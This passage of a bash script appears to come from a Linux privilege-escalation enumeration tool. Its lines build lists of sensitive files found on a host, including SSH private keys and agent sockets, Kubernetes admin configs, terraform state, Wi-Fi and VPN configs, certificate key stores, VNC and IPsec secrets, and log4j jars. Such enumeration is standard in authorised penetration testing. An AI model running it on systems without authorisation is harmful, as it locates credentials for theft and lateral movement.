    817   PSTORAGE_CESI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cesi\.conf$" | sort | uniq | head -n 70)
    818   PSTORAGE_RSYNC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70)
    819   PSTORAGE_RPCD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/init.d/|/sbin/|/usr/share/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rpcd$" | sort | uniq | head -n 70)
    820   PSTORAGE_BITCOIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "bitcoin\.conf$" | sort | uniq | head -n 70)
    821   PSTORAGE_HOSTAPD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70)
    822   PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}etc" | grep -E "system-connections$|wpa_supplicant$" | sort | uniq | head -n 70)
    823   PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}etc" | grep -E "pam\.d$" | sort | uniq | head -n 70)
    824   PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}etc" | grep -E "exports$" | sort | uniq | head -n 70)
    825   PSTORAGE_GLUSTERFS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head -n 70)
    826   PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70)
    827   PSTORAGE_TERRAFORM=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.tfstate$|.*\.tf$|credentials\.tfrc\.json$" | sort | uniq | head -n 70)
    828   PSTORAGE_RACOON=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70)
    829   PSTORAGE_KUBERNETES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}run|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*kubeconfig.*$|admin\.conf$|bootstrap-kubelet\.conf$|kubelet\.conf$|\.kube.*$|kubernetes$|kubelet$|kube-proxy$|kubernetes\.io$|net\.d$|containerd$|crio$|etcd$|origin$|k0s$|k3s$|rke2$|microk8s$" | sort | uniq | head -n 70)
    830   PSTORAGE_VNC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/mime/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70)
    831   PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ldap$" | sort | uniq | head -n 70)
    832   PSTORAGE_LOG4SHELL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70)
    833   PSTORAGE_OPENVPN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70)
    834   PSTORAGE_SSH=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$|.*\.pub$" | sort | uniq | head -n 70)
    835   PSTORAGE_CERTSB4=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70)
    836   PSTORAGE_CERTSBIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '^/usr/share/|/usr/local/lib/|/usr/lib/.*|/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70)
    837   PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70)
    838   PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '.dll' | grep -E "^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}run" | grep -E "agent\..*$|ssh-agent\.sock$" | sort | uniq | head -n 70)
    839   PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^$GREPHOMESEARCH|^${ROOT_FOLDER}usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70)
